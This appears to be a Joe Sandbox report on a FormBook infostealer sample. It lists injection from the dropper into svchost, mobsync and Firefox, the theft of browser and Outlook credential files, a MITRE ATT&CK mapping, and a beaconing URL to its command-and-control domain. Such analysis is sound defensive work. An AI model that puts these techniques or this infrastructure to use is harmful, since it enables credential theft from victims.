                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtQueryInformationProcess: Direct from: 0x77462C26
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtResumeThread: Direct from: 0x77462FBC
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtReadFile: Direct from: 0x77462ADC
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtQuerySystemInformation: Direct from: 0x77462DFC
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtDelayExecution: Direct from: 0x77462DDC
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtAllocateVirtualMemory: Direct from: 0x77463C9C
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtClose: Direct from: 0x77462B6C
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtCreateUserProcess: Direct from: 0x7746371C
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtWriteVirtualMemory: Direct from: 0x7746490C
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtAllocateVirtualMemory: Direct from: 0x774648EC
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtQuerySystemInformation: Direct from: 0x774648CC
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtQueryVolumeInformationFile: Direct from: 0x77462F2C
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtReadVirtualMemory: Direct from: 0x77462E8C
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtCreateKey: Direct from: 0x77462C6C
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtSetInformationThread: Direct from: 0x77462B4C
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtQueryAttributesFile: Direct from: 0x77462E6C
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtDeviceIoControlFile: Direct from: 0x77462AEC
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtOpenSection: Direct from: 0x77462E0C
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtCreateFile: Direct from: 0x77462FEC
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtOpenFile: Direct from: 0x77462DCC
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtQueryInformationToken: Direct from: 0x77462CAC
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtTerminateThread: Direct from: 0x77462FCC
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtAllocateVirtualMemory: Direct from: 0x77462BEC
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtOpenKeyEx: Direct from: 0x77462B9C
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\mobsync.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: NULL target: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe protection: read write
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: NULL target: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\mobsync.exe | Thread register set: target process: 8180
                Source: C:\Windows\SysWOW64\mobsync.exe | Thread APC queued: target process: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2D3C008
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Code function: 0_2_009587B1 LogonUserW
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Code function: 0_2_00903B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Code function: 0_2_009048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Code function: 0_2_00964C27 mouse_event
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Gz2FxKx2cM.exe"
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | Process created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"
                Source: C:\Windows\SysWOW64\mobsync.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Code function: 0_2_00957CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Code function: 0_2_0095874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: Gz2FxKx2cM.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Gz2FxKx2cM.exe, HFOpYoEqWJkRNv.exe, 00000004.00000000.1600202529.0000000001530000.00000002.00000001.00040000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000004.00000002.2675350449.0000000001530000.00000002.00000001.00040000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000008.00000002.2675643954.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: HFOpYoEqWJkRNv.exe, 00000004.00000000.1600202529.0000000001530000.00000002.00000001.00040000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000004.00000002.2675350449.0000000001530000.00000002.00000001.00040000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000008.00000002.2675643954.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: HFOpYoEqWJkRNv.exe, 00000004.00000000.1600202529.0000000001530000.00000002.00000001.00040000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000004.00000002.2675350449.0000000001530000.00000002.00000001.00040000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000008.00000002.2675643954.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: 0Program Manager
                Source: HFOpYoEqWJkRNv.exe, 00000004.00000000.1600202529.0000000001530000.00000002.00000001.00040000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000004.00000002.2675350449.0000000001530000.00000002.00000001.00040000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000008.00000002.2675643954.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Code function: 0_2_0092862B cpuid
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Code function: 0_2_00934E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Code function: 0_2_00941E06 GetUserNameW
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Code function: 0_2_00933F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Code function: 0_2_009049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

                Stealing of Sensitive Information

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.1677515886.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1677859953.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.2677153382.0000000004B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1921397485.0000000004180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1921482656.00000000041D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2675484945.0000000003440000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1678285172.0000000004550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\mobsync.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: Gz2FxKx2cM.exe | Binary or memory string: WIN_81
                Source: Gz2FxKx2cM.exe | Binary or memory string: WIN_XP
                Source: Gz2FxKx2cM.exe | Binary or memory string: WIN_XPe
                Source: Gz2FxKx2cM.exe | Binary or memory string: WIN_VISTA
                Source: Gz2FxKx2cM.exe | Binary or memory string: WIN_7
                Source: Gz2FxKx2cM.exe | Binary or memory string: WIN_8
                Source: Gz2FxKx2cM.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.1677515886.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1677859953.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.2677153382.0000000004B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1921397485.0000000004180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1921482656.00000000041D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2675484945.0000000003440000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1678285172.0000000004550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Code function: 0_2_00976283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Code function: 0_2_00976747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK matrix, one line per tactic. A number in front of a technique is the count of report signatures mapped to that technique; techniques without a number are the matrix's standard placeholder cells and carry no matched signature.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 2 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 2 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection
Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 1 Account Discovery; 1 File and Directory Discovery; 116 System Information Discovery; 151 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 3 Non-Application Layer Protocol; 3 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID 1588319; sample Gz2FxKx2cM.exe; start date 10/01/2025; architecture WINDOWS; score 100)

Start
  Signatures: Multi AV Scanner detection for submitted file; Yara detected FormBook; Binary is likely a compiled AutoIt script file; 2 other signatures
  DNS: www.izmirescortg.xyz (Performs DNS queries to domains with low reputation)
  Gz2FxKx2cM.exe (2) [started]
    Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
    svchost.exe [started]
      Signatures: Maps a DLL or memory area into another process
      HFOpYoEqWJkRNv.exe [injected]
        Signatures: Found direct / indirect Syscall (likely to bypass EDR)
        mobsync.exe (13) [started]
          Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
          HFOpYoEqWJkRNv.exe [injected]
            Signatures: Found direct / indirect Syscall (likely to bypass EDR)
            Network: www.izmirescortg.xyz 104.21.36.62:80 (local port 49709; CLOUDFLARENETUS, United States)
          firefox.exe [started]

Antivirus detection, initial sample (Source | Detection | Scanner | Label):
Gz2FxKx2cM.exe | 71% | ReversingLabs | Win32.Trojan.AutoitInject
Gz2FxKx2cM.exe | 54% | Virustotal
Gz2FxKx2cM.exe | 100% | Joe Sandbox ML
No Antivirus matches (reported three times, once per remaining scan category)

Antivirus detection, URLs (Source | Detection | Scanner | Label):
http://www.izmirescortg.xyz/lnl7/?_Lgdx=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZUCCvIMy+6OdADZldWa3Ro5vmyUj0qJuSG5eCoJgas7XnA==&Vf4hC=XvLPHfTX | 0% | Avira URL Cloud | safe
http://www.litespeedtech.com/error-page | 0% | Avira URL Cloud | safe

Contacted Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
www.izmirescortg.xyz | 104.21.36.62 | true | false | none | high

Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
http://www.izmirescortg.xyz/lnl7/?_Lgdx=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZUCCvIMy+6OdADZldWa3Ro5vmyUj0qJuSG5eCoJgas7XnA==&Vf4hC=XvLPHfTX | false | Avira URL Cloud: safe | unknown

URLs from Memory and Binary Data (Name | Source | Malicious | Antivirus Detection | Reputation). Apart from the litespeedtech error page, these are browser search-provider strings read out of mobsync.exe memory, consistent with the browser-data harvesting signature on that process rather than with command and control:
https://ac.ecosia.org/autocomplete?q= | mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmp | false | none | high
https://duckduckgo.com/chrome_newtab | mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmp | false | none | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmp | false | none | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmp | false | none | high
https://duckduckgo.com/ac/?q= | mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmp | false | none | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmp | false | none | high
https://www.ecosia.org/newtab/ | mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmp | false | none | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmp | false | none | high
http://www.litespeedtech.com/error-page | mobsync.exe, 00000007.00000002.1921955822.0000000004DF4000.00000004.10000000.00040000.00000000.sdmp; HFOpYoEqWJkRNv.exe, 00000008.00000002.2675961964.0000000002B34000.00000004.00000001.00040000.00000000.sdmp; firefox.exe, 00000009.00000002.2673702912.0000000015024000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmp | false | none | high

Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
104.21.36.62 | www.izmirescortg.xyz | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1588319
Start date and time: 2025-01-10 23:56:26 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 38s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Gz2FxKx2cM.exe (renamed because the original name is a hash value)
Original Sample Name: f3a50ff1e7a5fbde11e1f103161b01284e78d8bad05116052b6bfda6e9cac55a.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@1/1
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 85%
• Number of executed functions: 50
• Number of non-executed functions: 277
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analysed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded maximum capacity and may be missing disassembly code
                                    No simulations
Associated samples by contacted IP (Match | Sample Name / URL | Detection | Threat Name):
104.21.36.62 | YH-3-12-2024-GDL Units - Projects.exe | malicious | FormBook
104.21.36.62 | Thermo Fisher Scientific - Ajánlatkérés.exe | malicious | FormBook

Associated samples by contacted domain (Match | Sample Name / URL | Detection | Threat Name | Context IP):
www.izmirescortg.xyz | M7XS5C07kV.exe | malicious | FormBook | 172.67.186.192
www.izmirescortg.xyz | YH-3-12-2024-GDL Units - Projects.exe | malicious | FormBook | 104.21.36.62
www.izmirescortg.xyz | Order MEI PO IM202411484.exe | malicious | FormBook | 172.67.186.192
www.izmirescortg.xyz | BASF Hungária Kft.exe | malicious | FormBook | 172.67.186.192
www.izmirescortg.xyz | IETC-24017.exe | malicious | FormBook, PureLog Stealer | 172.67.186.192
www.izmirescortg.xyz | file.exe | malicious | FormBook | 172.67.186.192
www.izmirescortg.xyz | Thermo Fisher Scientific - Ajánlatkérés.exe | malicious | FormBook | 104.21.36.62

Associated samples by ASN (Match | Sample Name / URL | Detection | Threat Name | Context IP):
CLOUDFLARENETUS | cOH7jKmo25.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 104.16.184.241
CLOUDFLARENETUS | 3i1gMM8K4z.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 104.21.16.1
CLOUDFLARENETUS | 2NJzy3tiny.exe | malicious | MassLogger RAT | 104.21.32.1
CLOUDFLARENETUS | z87sammylastborn.exe | malicious | MassLogger RAT | 104.21.48.1
CLOUDFLARENETUS | vnV17JImCH.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.80.1
CLOUDFLARENETUS | Setup.exe | malicious | LummaC | 188.114.96.3
CLOUDFLARENETUS | xJZHVgxQul.exe | malicious | AgentTesla | 104.26.12.205
CLOUDFLARENETUS | czHx16QwGQ.exe | malicious | GuLoader, MassLogger RAT | 104.21.112.1
CLOUDFLARENETUS | Ddj3E3qerh.exe | malicious | Snake Keylogger | 104.21.96.1
CLOUDFLARENETUS | Setup.exe | malicious | Unknown | 104.21.80.1
                                        No context
                                        No context
Process: C:\Windows\SysWOW64\mobsync.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1209886597424439
Encrypted: false
SSDEEP: 192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
MD5: EFD26666EAE0E87B32082FF52F9F4C5E
SHA1: 603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
SHA-256: 67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
